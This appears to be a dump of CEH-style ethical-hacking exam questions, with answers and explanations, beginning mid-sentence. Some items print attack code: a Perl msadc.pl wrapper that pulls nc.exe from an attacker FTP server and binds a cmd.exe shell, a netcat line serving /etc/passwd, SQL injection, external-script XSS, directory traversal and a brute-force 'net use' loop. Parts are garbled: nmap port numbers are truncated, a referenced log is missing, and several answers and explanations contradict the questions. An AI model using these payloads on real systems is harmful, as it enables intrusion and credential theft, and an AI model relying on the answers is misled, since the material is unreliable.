looking to law enforcement officials to protect their intellectual property.
How did this attack occur? The intruder entered through an employee's home machine, which was
connected to Spears Technology's corporate VPN network. The application called BEAST Trojan
was used in the attack to open a "back door" allowing the hackers undetected access. The
security breach was discovered when customers complained about the usage of their credit cards
without their knowledge.
The hackers were traced back to Beijing, China through e-mail address evidence. The credit card
information was sent to that same e-mail address. The passwords allowed the hackers to access
Spears Technology's network from a remote location, posing as employees. The intent of the
attack was to steal the source code for their VOIP system and "hold it hostage" from Spears
Technology, in exchange for ransom.
The hackers had intended on selling the stolen VOIP software source code to competitors.
How would you prevent such attacks from occurring in the future at Spears Technology?
A. Disable VPN access to all your employees from home machines
B. Replace the VPN access with dial-up modem access to the company's network
C. Allow VPNaccess but replace the standard authentication with biometric authentication
D. Enable 25 character complex passwordpolicy for employees to access the VPN network
A. Disable VPN access to all your employees from home machines.

As long as there is a way in for employees through all security measures, you can't be secure, because you never know what computer the employees use to access resources at their workplace.
Buffer overflows are one of the top flaws for exploitation on the Internet today. A buffer overflow
occurs when a particular operation/function writes more data into a variable than the variable was
designed to hold. The two popular types of buffer overflows prevalent today are:
A. Dynamic buffer overflow
B. Active buffer overflow
C. Heap based buffer overflow
D. Stack based buffer overflow
C. Heap based buffer overflow
D. Stack based buffer overflow.
Bryce the bad boy is purposely sending fragmented ICMP packets to a remote target. The total
size of this ICMP packet once reconstructed is over 65,536 bytes. From the information given,
what type of attack is Bryce attempting to perform?
A. Smurf
B. Ping of Death
C. Fraggle
D. SYN Flood
B. Ping of Death
Matthew re-injects a captured wireless packet back onto the network. He does this hundreds of
times within a second. The packet is correctly encrypted and Matthew assumes it is an ARP
request packet. The wireless host responds with a stream of responses, all individually encrypted
with different IVs. What is this attack most appropriately called?
A. Injection attack
B. Replay attack
C. Rebound attack
D. Spoof attack
B. Replay attack.

A replay attack is a form of network attack in which a valid data transmission is maliciously or fraudently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it, possibly as part of a masquerade attack by IP packet substitution (such as stream cipher attack.)
John the hacker is sniffing the network to inject ARP packets. He injects broadcast frames onto
the wire to conduct MiTM attack. What is the destination MAC address of a broadcast frame?
A. 0xDDDDDDDDDDDD
B. 0xFFFFFFFFFFFF
C. 0xBBBBBBBBBBBB
D. 0xAAAAAAAAAAAA
B. 0xFFFFFFFFFFFF is the destination MAC address of the broadcast frame.
Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?
A. Stealth keylogger
B. Hardware keylogger
C. Software keylogger
D. Covert keylogger
B. Hardware keylogger

As thehardware keylogger never interacts with the OS, it is undetectable by anti-virus or anti-spyware products.
What is the expected result of the following exploit?
#################################################################
$port = 53;# Spawn cmd.exe on port X
$your = "192.168.1.1";# Your FTP Server
$user = "Anonymous";# login as
$pass = 'noone@nowhere.com';# password
#################################################################
$host = $ARGV[0];
print "Starting ...\n";
print "Server will download the file nc.exe from $your FTP server.\n";
system("perl msadc.pl -h $host -C \"echo open $your >sasfile\"");
system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo $pass>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo bin>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo get hacked.html>>sasfile\"");
system("perl msadc.pl -h $host -C \"echo quit>>sasfile\"");
print "Server is downloading ...\n";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\"");
print "Press ENTER when download is finished ... (That's why it's good to have your own ftp
server)\n";
$o=<STDIN>; print "Opening ...\n";
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\"");
print "Done.\n";
#system("telnet $host $port"); exit(0);
A. Opens up a telnet listener that requires no username or password
B. Creates an FTP server with write permissions enabled
C. Creates a share called "sasfile" on the target system
D. Opens an account with a username of Anonymous and a password of noone@nowhere.com
A. Opens up a telnet listener tha trequires no username or password.

The script being depicted is in perl (both msadc.pl and the script their using as a wrapper) -- $port,
$your, $user, $pass, $host are variables that hold the port # of a DNS server, an IP, username,
and FTP password. $host is set to argument variable 0 (which means the string typed directly after
the command). Essentially what happens is it connects to an FTP server and downloads nc.exe
(the TCP/IP swiss-army knife -- netcat)and uses nc to open a TCP port spawning cmd.exe
(cmd.exe is the Win32 DOS shell on NT/2000/2003/XP), cmd.exe when spawned requires NO
username or password and has the permissions of the username it is being executed as (probably
guest in this instance, although it could be administrator). The #'s in the script means the text
following is a comment, notice the last line in particular, if the # was removed the script would spawn a connection to itself, the host system it was running on.
What are the four existing Regional Internet Registry (RIR's)?
A. RIPE NCC, LACNIC, ARIN, APNIC
B. RIPE NCC, NANIC, ARIN, APNIC
C. RIPE NCC, ARIN, APNIC, LATNIC
D. APNIC, PICNIC, ARIN, LACNIC
A. RIPE NCC, LACNIC, ARIN, APNIC

All other answers includenon existing organizations (PICNIC, NANIC, LATNIC). See
What type of port scan is shown below?
Scan directed at open port:
ClientServer
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23
192.5.2.92:4079 <----NO RESPONSE------192.5.2.110:23
Scan directed at closed port:
ClientServer
192.5.2.92:4079 ---------FIN--------->192.5.2.110:23
192.5.2.92:4079<-----RST/ACK----------192.5.2.110:23
D. FIN scan
Clive has been hired to perform a Black-Box test by one of his clients. How much information will
Clive be able to get from the client before commencing his test?
A. Only the IP address range
B. All that is available from the client
C. Nothing but corporate name
D. IP Range, OS, and patches installed
C. Nothing but the corporate name.

Pen tests can be conducted as black box or white box. Black Box means that the tester has no prior knowledge of the infrastructure to be tested. White Box means that the pen tester has complete knowledge of the infrastructure.
Windump is a Windows port of the famous TCPDump packet sniffer available on a variety of
platforms. In order to use this tool on the Windows platform you must install a packet capture
library. What is the name of this library?
A. NTPCAP
B. WinPCAP
C. PCAP
D. LibPCAP
B. WinPCAP

Win PCAP is the industry standard tool for link-layer network access in Windows environments. It allows applications to capture and transmit network packets bypassing the protocol stack, and has additional useful features, including kernel-level packet filtering, a network statistics engine, and support for remote packet capture.
Jake works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends
him at the canteen and tags along with him on the pretext of appraising him about potential tax
benefits. Jason waits for Jake to swipe his access card and follows him through the open door into
the secure systems area. How would you describe Jason's behavior within a security context?

A. Swipe Gating
B. Smooth Talking
C. Trailing
D. Tailgating
D. Tailgating
What is Cygwin?
A. Cygwin isa X Windows GUI subsytem that runs on top of Linux GNOME environment
B. Cygwin is a free C++ compiler that runs on Windows
C. Cygwin is a freeUnix subsystem that runs on top of Windows
D. Cygwin is a free Windows subsystem that runs on top of Linux
C. Cygwin is a free Unix subsystem that runs on top of windows.

Cygwin is a Linux-like environment for Windows. It consists of two parts: A DLL (cygwin1.dll) which acts as a Linux API emulation layer providing substantial Linux API functionality, and a collection of tools which provide Linux look and feel.
Which type of scan does not open a full TCP connection?
A. Stealth Scan
B. XMAS Scan
C. Null Scan
D. FIN Scan
A. A stealth scan.

Instead of completing the full TCP three-way-handshake a full connection is not
made. A SYN packet is sent to the system and if a SYN/ACK packet is received it is assumed that
the port on the system is active. In that case a RST/ACK will be sent which will determined the
listening state the system is in. If a RST/ACK packet is received, it is assumed that the port on the
system is not active.
Which of the following commands will you run in Linux to check for the presence of rootkits?
A. $ sudo runvirus
B. $ sudo avcheck
C. $ sudo chrootkit
D. $ sudo rootvirus
C. $ sudochrootkit
Travis works primarily from home as a medical transcriptionist.
He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM.
He uses voice recognition software to help him transfer what he dictates to electronic documents.
The voice recognition software is processor intensive, which is why he bought the new computer.
Travis frequently has to get on the Internet to do research on what he is working on.
After about two months of working on his new computer, he notices that it is not running nearly as
fast as it used to.
Travis uses antivirus software, anti-spyware software, and always keeps the computer up-to-date
with Microsoft patches.
After another month of working on the computer, Travis' computer is even more noticeably slow.
Every once in awhile, Travis also notices a window or two pop-up on his screen, but they quickly
disappear.He has seen these windows show up, even when he has not been on the Internet.
Travis is really worried about his computer because he spent a lot of money on it, and he depends
on it to work. Travis scans his computer with all kinds of software, and cannot find anything out of
the ordinary. Travis decides to go through Windows Explorer and check out the file system, folder
by folder, to see if there is anything he can find. He spends over four hours pouring over the files
and folders and cannot find anything.But, before he gives up, he notices that his computer only
has about 10 GB of free space available.Since his hard drive is a 200 GB hard drive, Travis thinks this is very odd.
Travis downloads Space Monger and adds up the sizes for all the folders and files on his
computer. According to his calculations, he should have around 150 GB of free space. What is most likely the cause of Travis' problems?

A. Travis's computer is infected with Self-Replication Worm that fills the hard disk space
B. Logic Bomb is triggered at random times creating hidden data consuming junk files
C. Travis's computer is infected with a stealth kernel level rootkit
D. Travis's computer is infected with Stealth Trojan Virus
C. Travis's computer is probably infected with a stealth kernel root-kit.

A rootkit can take full control of a system. A rootkit's only purpose is to hide files, network
connections, memory addresses, or registry entries from other programs used by system
administrators to detect intended or unintended special privilege accesses to the computer resources.
Joseph has just been hired on to a contractor company of the Department of Defense as their
Senior Security Analyst. Joseph has been instructed on the company's strict security policies that
have been implemented, and the policies that have yet to be put in place. Per the Department of
Defense, all DoD users and the users of their contractors must use two-factor authentication to
access their networks. Joseph has been delegated the task of researching and implementing the
best two-factor authentication method for his company. Joseph's supervisor has told him that they
would like to use some type of hardware device in tandem with a security or identifying pin
number.
Joseph's company has already researched using smart cards and all the resources needed to
implement them, but found the smart cards to not be cost effective. What type of device should Joseph use for two-factor authentication?

A. Proximity cards
B. Security token
C. Biometric device
D. OTP
B. Security Token
Paul has just finished setting up his wireless network.?He has enabled numerous security features
such as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on his
wireless router. Paul notices that when he uses his wireless connection, the speed is sometimes
54 Mbps and sometimes it is only 24Mbps or less. Paul connects to his wireless router's
management utility and notices that a machine with an unfamiliar name is connected through his
wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the
same MAC address as his laptop.
What is Paul seeing here?
A. MAC spoofing
B. Macof
C. ARP spoofing
D. DNS spoofing
A. MAC spoofing.

You can fool MAC filtering by spoofing your MAC address and pretending to have another computer's MAC address.
You perform the following traceroute and notice that hops 19 and 20 both show the same IP address. What does this most likely indicate?
1 172.16.1.254 (172.16.1.254) 0.724 ms 3.285 ms 0.613 ms
2 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 12.169 ms 14.958 ms 13.416 ms
3 ip68-98-176-1.nv.nv.cox.net (68.98.176.1) 13.948 ms ip68-100-0-1.nv.nv.cox.net
(68.100.0.1) 16.743 ms 16.207 ms
4 ip68-100-0-137.nv.nv.cox.net (68.100.0.137) 17.324 ms 13.933 ms 20.938 ms
5 68.1.1.4 (68.1.1.4) 12.439 ms 220.166 ms 204.170 ms
6 so-6-0-0.gar2.wdc1.Level3.net (67.29.170.1) 16.177 ms 25.943 ms 14.104 ms
7 unknown.Level3.net (209.247.9.173) 14.227 ms 17.553 ms 15.415 ms
18 example-gw1.customer.alter.net (65.195.239.14) 51.921 ms 51.571 ms 56.855 ms
19 www.example.com (65.195.239.22) 52.191 ms 52.571 ms 56.855 ms
20 www.example.com (65.195.239.22) 53.561 ms 54.121 ms 58.333 ms

A. A Honeypot
B. A host based IDS
C. A stateful inspection firewall
D. An application proxying firewall
C. A stateful inspection firewall.
Which of the following is an attack in which a secret value like a hash is captured and then reused at a later time to gain access to a system without ever decrypting or decoding the hash.
A. Brute Force Attacks
B. John the Ripper Attacks
C. Cryptography Attacks
D. Replay Attacks
D. Replay Attacks.

A replay attack is a form of a network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and retransmits it.
In an attempt to secure his wireless network, Bob implements a VPN to cover the wireless communications he is using in his office. Soon after the implementation, users begin complaining about the wireless network slowing down. After benchmarking the network's speed, Bob discovers that throughput has dropped by almost half, even though the number of users has remained the same. What do you think is the reason behind this?
A. VPNs use larger packets than wireless networks normally do
B. Using a VPN with wireless doubles the overhead on an access point for all directclient to access point communications
C. Using a VPN on wireless automatically enables WEP, which causes additional overhead
D. The stronger encryption used by the VPN slows down the network
B. Using a VPN with wireless doubles the overhead on an access point for all directclient to access point communications.

By applying VPN the access point will have to recalculate all headers destined for client and from clients twice.
Which of the following attacks takes best advantage of an existing authenticated connection
A. Session Hijacking
B. Password Guessing
C. Password Sniffing
D. Spoofing
A. Session hijacking.
Nathalie would like to perform a reliable scan against a remote target. She is not concerned about being stealth at this point. Which of the following type of scans would be the most accurate and reliable?

A. A UDP scan
B. A FIN scan
C. A TCP Connect scan
D. A half-scan
A. A TCP connect scan

A TCP Connect scan, named after the Unix connect( ) system call is the most accurate scanning
method. If a port is open the operating system completes the TCP three-way handshake, and the
port scanner immediately closes the connection. Otherwise an error code is returned.
Given the following extract from the snort log on a honeypot, what service is being exploited?

A. SSH
B. SMTP
C. FTP
D. Telnet
C. FTP

The connection is done to 172.16.1.104:21
You have initiated an active operating system fingerprinting attempt with nmap against a target
system:root@ceh NG]# /usr/local/bin/nmap -sT -O 10.0.0.1
Starting nmap 3.28 ( www.insecure.org/nmap/) at 2003-06-18 19:14 IDT
nteresting ports on 10.0.0.1:
The 1628 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp filtered ftp
2/tcp filtered ssh
5/tcp open smtp
0/tcp open http
35/tcp open loc-srv
39/tcp open netbios-ssn
89/tcp open LDAP
43/tcp open https
65/tcp open smtps
029/tcp open ms-lsa
433/tcp open ms-sql-s
301/tcp open compaqdiag
555/tcp open freeciv
800/tcp open vnc-http
900/tcp open vnc
000/tcp filtered X11
Remote operating system guess: Windows XP, Windows 2000, NT4 or 95/98/98SE
map run completed -- 1 IP address (1 host up) scanned in 3.334 seconds
Using its fingerprinting tests nmap is unable to distinguish between different groups of Microsoft
based operating systems - Windows XP, Windows 2000, NT4 or 95/98/98SE.
What operating system is the target host running based on the open ports shown above?
A. Windows 98 SE
B. Windows 2000 Server
C. Windows NT4 Server
D. Windows XP
B. WIndows 2000 Server

The system is reachable as an active directory domain controller (port 389, LDAP)
Frederickson Security Consultants is currently conducting a security audit on the networks of
Hawthorn Enterprises, a contractor for the Department of Defense. Since Hawthorn Enterprises
conducts business daily with the federal government, they must abide by very stringent security
policies. Frederickson is testing all of Hawthorn's physical and logical security measures including
biometrics, passwords, and permissions.
The federal government requires that all users must utilize random, non-dictionary passwords that
must take at least 30 days to crack. Frederickson has confirmed that all Hawthorn employees use
a random password generator for their network passwords. The Frederickson consultants have
saved off numerous SAM files from Hawthorn's servers using Pwdump6 and are going to try and
crack the network passwords.
What method of attack is best suited to crack these passwords in the shortest amount of time?
A. Birthday attack
B. Brute service attack
C. Brute force attack
D. Dictionary attack
C. Brute Force Attack
What does the following command in netcat do?
nc 55555 < /etc/passwd
A. loads the /etc/passwd file to the UDP port 55555
B. logs the incoming connections to /etc/passwd file
C. deletes the /etc/passwd file when connected to the UDP port 55555
D. grabs the /etc/passwd file when connected to UDP port 55555
D. Grabs the /etc/passwd file when connected to UDP port 55555.

-l forces netcat to listen for incoming connections
-u tells netcat to use UDP instead of TCP
--p 55555 tells netcat to use port 55555
< /etc/passwd tells netcat to grab the /etc/passwd file when connected.
Which of the following Exclusive OR transforms bits is NOT correct?
A. 0 xor 0 = 0
B. 1 xor 0 = 1
C. 0 xor 1 = 1
D. 1 xor 1 = 1
D. 1 xor 1 = 1
Once an intruder has access to a remote system with a valid username and password, the
attacker will attempt to increase his privileges by escalating the compromised account to one
having increased privileges, such as that of an administrator. What would be the best countermeasure to protect against such escalation?

A. Give users tokens
B. Give user the least amount of privileges
C. Give users a strong policy document
D. Give users two passwords
B. Give users the least amount of privileges.

The doctrine of least privilege means that it is harder to increase privileges.
Steven is a senior security analyst for a state agency in Tulsa, Oklahoma. His agency is currently undergoing a mandated security audit by an outside consulting firm. The consulting firm is halfway
through the audit and is preparing to perform the actual penetration testing against the agency's network. The firm first sets up a sniffer on the agency's wired network to capture a reasonable amount of traffic to analyze later. This takes approximately 2 hours to obtain 10 GB of data. The
consulting firm then sets up a sniffer on the agency's wireless network to capture the same amount of traffic.This capture only takes about 30 minutes to get 10 GB of data. Why did the capturing of traffic take much less time on the wireless network?
A. Because all traffic is clear text, even when encrypted
B. Because wireless networks cannot enable encryption
C. Because wireless traffic uses only UDP which is easier to sniff
D. Because wireless access points act like hubs on a network
D. Because wireless access points act like hubs on a network.
How would you describe a simple yet very effective mechanism for sending and receiving
unauthorized information or data between machines without alerting any firewalls and IDS's on a
network?
A. Crafted Channel
B. Deceptive Channel
C. Bounce Channel
D. Covert Channel
D. Covert channel.

A covert channel is described as "any communication channel that can be exploited by a process to transfer information in a manner that violates the system's security policy." Essentially, it is a method of communication that is not part of the actual computer system design, but can be used ot transfer information to users or system processes that normally would not be allowed access to the information.
While probing an organization you discover that they have a wireless network. From your attempts to connect to the WLAN you determine that they are using MAC filtering by using ACLs on the access points. What would be the easiest way to circumvent this and connect to the WLAN?

A. Steal a client computer and use it to access the wireless network
B. Attempt to brute force the access point and update or delete the MAC ACL's
C. Attempt to crack the WEP key using Airsnort
D. Sniff traffic off the WLAN and spoof your MAC address to the one that you have captured
D. The easiest way to grain access to the WLAN would be to spoof your MAC address to one that already exists on the network.
Dan is conducting a penetration testing and has found a vulnerability in a Web Application which gave him the sessionID token via a cross site scripting vulnerability. Dan wants to replay this token. However, the session ID manager (on the server) checks the originating IP address as well.
Dan decides to spoof his IP address in order to replay the sessionID. Why do you think Dan might not be able to get an interactive session?
A. Dan cannot spoof his IP address over TCP network
B. The server will send replies back to the spoofed IP address
C. Dan can establish an interactive session only if he uses a NAT
D. The scenario is incorrect as Dan can spoof his IP and get responses
B. The server will send replies back to the spoofed IP address.

Spoofing your IP address is only effective when there's no need to establish a two-way connection, as all traffic meant ot go to the attacker will end up at the spoofed address.
You receive an e-mail with the following text message.
"Microsoft and AOL today warned all customers that a new, highly dangerous virus has been discovered which will erase all your files at midnight. If there's a file called hidserv.exe on your computer, you have been infected and your computer is now running a hidden server that allows
hackers to access your computer. Delete the file immediately. Please also pass this message to
all your friends and colleagues as soon as possible."
You launch your antivirus software and scan the suspicious looking file hidserv.exe located in
c:\windows directory and the AV comes out clean meaning the file is not infected. You view the file signature and confirm that it is a legitimate Windows system file "Human Interface Device Service."
What category of virus is this?
A. Spooky Virus
B. Virus hoax
C. Polymorphic Virus
D. Stealth Virus
B. Virus hoax.
Eve is spending her day scanning the library computers. She notices that Alice is using a computer whose port 445 is active and listening. Eve uses the ENUM tool to enumerate Alice's
machine. From the command prompt, she types the following command.
For /f okens=1 %%a in (hackfile.txt) do net use * \\10.1.2.3\c$ /user:dministrator?%%a
What is Eve trying to do?

A. Eve is trying to carry out a password crack for user Administrator
B. Eve is trying to escalate privilege of the null user to that of Administrator
C. Eve is trying to connect asan user with Administrator privileges
D. Eve is trying to enumerate all users with Administrative privileges
A. Eve is trying to carry out a password crack for user Administrator.

Eve is trying to get a successful login using the name Administrator and passwords from the file hackfile.txt
Joseph is the Web site administrator for the Mason Insurance in New York, whose primary website is located at http://www.masonins.com/. Joseph uses his laptop computer regularly for website
administration. One night, an associate notifies Joseph that the main Mason Insurance web site had been vandalized! In place of the legitimate content, the hacker had left a message ''H@cker Mess@ge: Y0u @re De@d! Fre@ks! ''
Joseph surfed to the Web site from his office, which was directly connected to Mason Insurance's internal network using his laptop. However, no changes were apparent to him and he could see the legitimate content. Joseph was puzzled when another employee called in to report the defaced website. Joseph logged off the company's internal LAN and accessed the company Web site using his dialup ISP connection. He browsed to http://www.masonins.com/ and saw the following on the web page:
H@ckermailto:H@cker Mess@gemailto:Mess@ge: Y0u @re De@dmailto:De@d!
Fre@ksmailto:Fre@ks!
After seeing the defaced Web site, he disconnected his dial-up line, reconnected to the internal
network, and used Secure Shell (SSH) to log in directly to the Web server. He ran Tripwire against
the entire Web site, and found that every system file and all the Web content on the server were
intact.
How did the attacker accomplish this hack?
A. ARP spoofing
B. Routing table injection
C. SQL injection
D. DNS poisoning
D. DNS Poisoning

External calls for the Web site has been redirected to another server by a successful DNS
poisoning.
Stephanie works as a records clerk in a large office building in downtown Chicago.On Monday,
she went to a mandatory security awareness class (Security5) put on by her company's IT
department.During the class, the IT department informed all employees that everyone's Internet
activity was thenceforth going to be monitored.
Stephanie is worried that her Internet activity might give her supervisor reason to write her up, or
worse get her fired.Stephanie's daily work duties only consume about four hours of her time, so
she usually spends the rest of the day surfing the web. Stephanie really enjoys surfing the Internet
but definitely does not want to get fired for it.
What should Stephanie use so that she does not get in trouble for surfing the Internet?
A. Stealth Firefox
B. Cookie Disabler
C. Stealth Anonymizer
D. Stealth IE
C. Stealth Anonymizer
Identify SQL injection attack from the HTTP requests shown below:
A. http://www.victim.com/example?accountnumber=67891&creditamount=999999999
B.
http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass
wd%3d%27hAx0r%27%3b--%00
C.
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser
ver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
D. http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
B. http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass
wd%3d%27hAx0r%27%3b--%00

The correct answer contains the code to alter the usertable in order to change the
password for user smith to hAx0r
Liza has forgotten her password to an online bookstore. The web application asks her to key in her
email so that they can send her the password. Liza enters her email liza@yahoo.com'. The
application displays server error. What is wrong with the web application?
A. The email is not valid
B. User input is not sanitized
C. The ISP connection is not reliable
D. The web server may be down
B. User input is not sanitized

All input from web browsers, such as user data from HTML forms and cookies, must be stripped of
special characters and HTML tags as described in the following CERT advisories:
http://www.cert.org/advisories/CA-1997-25.html
http://www.cert.org/advisories/CA-2000-02.html
You are writing an antivirus bypassing Trojan using C++ code wrapped into chess.c to create an
executable file chess.exe. This Trojan when executed on the victim machine, scans the entire
system (
A. HKEY_LOCAL_SYSTEM\SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
B. HKEY_LOCAL_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Start
C. HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Desktop
D. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
D. HKEY_CURRENT_USER\SOFTWARE\Microsoft|Windows|CurrentVersion|Desktop

HKEY_LOCAL_MACHINE would be the natural place for a registry entry that starts services when the MACHINE is rebooted
You are trying to break into a highly classified top-secret mainframe computer with highest security system in place at Merclyn Barley Bank located in Los Angeles. You know that conventional
hacking doesn't work in this case, because organizations such as banks are generally tight and secure when it comes to protecting their systems. In other words you are trying to penetrate an
otherwise impenetrable system.
How would you proceed?

A. Try to conduct Man-in-the-Middle (MiTM) attack and divert the network traffic going to the Merclyn Barley Bank's Webserver to that of your machine using DNS Cache Poisoning techniques
B. Look for "zero-day" exploits at various underground hacker websites in Russia and China
and buy the necessary exploits from these hackers and target the bank's network
C. Launch DDOS attacks against Merclyn Barley Bank's routers and firewall systems using 100,000 or more "zombies" and "bots"
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information
D. Try to hang around the local pubs or restaurants near the bank, get talking to a poorly-paid or disgruntled employee, and offer them money if they'll abuse their access privileges by providing you with sensitive information.
You come across a WiFi network in your neighborhood. You pull up your hardware WiFi sniffer
from your car and tune into 802.11a network to sniff the Wireless traffic for sensitive data. What
frequency will you tune the Wireless hardware device to?
A. 900MHz-2.462 GHz
B. 5.15-5.825 GHz
C. 2.323-2.462 GHz
D. 2.412-2.462 GHz
B. 5.15 - 5.825 GHz
Which programming language is NOT vulnerable to buffer overflow attacks?
A. Assembly Language
B. C++
C. ActiveX
D. Java
D. Java

Perl and Java have boundary checking, hence buffer overflows don't occur. On the other hand, Perl and Java don't offer access to the system that is as deep as some applications require.
SNMP is a protocol used to query hosts, servers, and devices about performance or health status
data. Hackers have used this protocol for a long time to gather great amount of information about
remote hosts. Which of the following features makes this possible?
A. It uses TCP as the underlying protocol
B. It uses a community string sent as clear text
C. It is susceptible to sniffing
D. It is used by ALL devices on the market
B. It uses a community string sent as cleartext
C. It is susceptible to sniffing.

SNMP uses UDP, not TCP, and even though many devices use SNMP, not all devices use it and it can be disabled on most of the devices that do use it. However, SNMP is susceptible to sniffing and the community string (which can be said to act as a password) is sent in cleartext.
Fingerprinting an Operating System helps a cracker because:
A. It doesn't depend on the patches that have been applied to fix existing security holes
B. It opens a security-delayed window based on the port being scanned
C. It informs the cracker of which vulnerabilities he may be able to exploit on your system
D. It defines exactly what software you have installed
C. When a cracker knows what OS and services you use, he also knows which exploits might work on your system. If he would have to try all possible exploits for all possible OSs and Services, it would take too much time and the possibility of detection would be much higher.
A program that defends against a port scanner will attempt to:
A. Log a violation and recommend use of security-auditing tools
B. Update a firewall rule in real time to prevent the port scan from being completed
C. Sends back bogus data to the port scanner
D. Limit access by the scanning system to publicly available ports only
B. Update a firewall rule in realtime to prevent the port scan from being completed.
Statistics from cert.org and other leading security organizations have clearly shown a steady
increase in the number of hacking incidents against companies. What do you think is the main
reason we have seen such a huge increase in hacking attempts over the past years?
A. Increase in processing power
B. It is getting harder to hack and more challenging for non technical people
C. The ease of getting hacker tools on the Internet
D. New TCPIP stack features are constantly being added
C. The ease of getting hacker tools on the Internet.
Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker.After performing routine maintenance on his servers, he
discovers numerous remote tools were installed that no one claims to have knowledge of in his department.
Gerald logs onto the management console for his IDS and discovers an unknown IP address that
scanned his network constantly for a week and was able to access his network through a highlevel port that was not closed.Gerald traces the IP address he found in the IDS log to a proxy server in Brazil.
Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland.Gerald calls the company in Switzerland
that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China.
What tool has Gerald's attacker used to cover their tracks?
A. IAS
B. Cheops
C. ISA
D. Tor
D. Tor

Tor is a network of virtual tunnels tha tallows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. it provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote websites from tracking them or their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local ISPs.
You want to carry out session hijacking on a remote server. The server and the client are
communicating via TCP after a successful TCP three-way handshake. The server has just
received packet #120 from the client. The client has a receive window of 200 and the server has a
receive window of 250. What is the range of packet sequence numbers that would be accepted by
the server?
A. 121-371
B. 120-370
C. 200-250
D. 121-231
E. 120-321
A. 121-371

Package number 120 have already been received by the server and the window is 250 packets, so any package number from 121 (next in sequence) to 371 (121+250).
Henry is an attacker and wants to gain control of a system and use it to flood a target system with requests, so as to prevent legitimate users from gaining access. What type of attack is Henry
using?
A. Henry is using a denial of service attack which is a valid threat used by an attacker
B. Henry uses poorly designed input validation routines to create or alter commands to gain
access to unintended data or execute commands
C. Henry is executing commands or viewing data outside the intended target path
D. Henry is taking advantage of an incorrect configuration that leads to access with higher-than expected
privilege
A. Henry is using a DoS attack, which is a valid threat used by an attacker.

Henry's intention is to perform a DoS attack against his target, possibly a DDoS attack. He uses systems other than his own to perform the attack in order to cover the trail back to him, and to get more "punch" in the DoS attack by using multiple systems.
Steve scans the network for SNMP enabled devices. Which port number Steve should scan?
A. 161
B. 169
C. 150
D. 69
A. 161

The default SNMP port is 161. Port 69 is for TFTP, Port 150 is for SQL-NET and 169 is for SEND.
The GET method should never be used when sensitive data such as credit card is being sent to a CGI program. This is because any GET command will appear in the URL, and will be logged by any servers. For example, let's say that you've entered your credit card information into a form that
uses the GET method. The URL may appear like this:
https://www.xsecurity-bank.com/creditcard.asp?cardnumber=453453433532234
The GET method appends the credit card number to the URL. This means that anyone with access to a server log will be able to obtain this information.
How would you protect from this type of attack?

A. Replace the GET with POST method when sending data
B. Encrypt the data before you send using GET method
C. Never include sensitive information in a script
D. Use HTTPS SSLv3 to send the data instead of plain HTTPS
A. Replace GET with POST method when sending data.

If the method is "Get" the user agent takes the value of action, appends a ? to it, then appends the form data set, encoded using the application/x-www-for-urlencoded content type. The user agent then traverses the link to this URL. If the method is "post" the user agent conducts an HTTP post transaction using the value of hte action attribute and a message is created according to the content type specified by the enctype attribute.
What is the command used to create a binary log file using tcpdump?

A. tcpdump -r log
B. tcpdump -l /var/log/
C. tcpdump -vde log
D. tcpdump -w ./log
D. tcpdump -w ./log
Jonathan being a keen administrator has followed all of the best practices he could find on
securing his Windows Server. He renamed the Administrator account to a new name that cannot
be easily guessed but there remain people who attempt to compromise his newly renamed
administrator account. How can a remote attacker decipher the name of the administrator account
if it has been renamed?
A. The attacker used the sid2user program
B. The attacker guessed the new name
C. The attacker used the user2sid program
D. The attacker used NMAP with the V switch
A. The attacker used the sid2user program.

User2sid.exe can retrieve a SID from the SAM (Security Accounts Manager) from the local or a remote machine. Sid2user.exe can then be used to retrieve the names of all the user accounts and more. These utilities do not exploit a bug, but clal teh functions LookupAccountName and LookupAccountSid respectively. These can then be called against a remote machine without providing logon credentials, except for those needed for a null session connection.
Take a look at the following attack on a Web Server using obstructed URL:
http://www.example.com/script.ext?template=%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63
%2f%70%61%73%73%77%64
This request is made up of:
.%2e%2e%2f%2e%2e%2f%2e%2e%2f = ../../../
.%65%74%63 = etc
.%2f = /
.%70%61%73%73%77%64 = passwd

How would you protect from these attacks?

A. Configure the web-server to deny requests involving "hex encoded characters."
B. Use SSL authentication on web-servers
C. Create rules in IDS to alert on strange Unicode requests
D. Enable Active Scripts Detection at the firewall and routers.
C. Create rules in IDS to alert on strange Unicode requests.

